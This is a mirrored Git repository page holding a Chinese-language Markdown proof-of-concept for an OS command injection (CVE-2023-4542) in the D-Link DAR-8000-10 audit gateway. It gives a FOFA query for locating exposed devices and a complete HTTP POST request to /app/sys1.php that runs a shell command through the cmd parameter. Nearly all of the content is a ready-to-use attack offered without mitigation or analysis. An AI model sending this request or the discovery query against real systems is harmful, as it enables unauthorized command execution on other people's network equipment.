admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/D-Link/D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

35 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
D-Link DAR-8000是中国友讯D-Link公司的上网行为审计网关。
D-Link DAR-8000-10版本存在操作系统命令注入漏洞该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。
![c28cb815357f9d7746051855c037606e](https://github.com/wy876/POC/assets/139549762/ce09a764-517f-449d-8296-97a315b590ba)
## fofa
```
body="DAR-8000-10" && title="D-Link"
```
## poc
```
POST /app/sys1.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
cmd=id
```
![532f25d46e25fe6fb6ceff1b97beb88f](https://github.com/wy876/POC/assets/139549762/4ac6df4e-d49c-43ee-83f2-e49ce8f7db3b)
Reference in New Issue View Git Blame Copy Permalink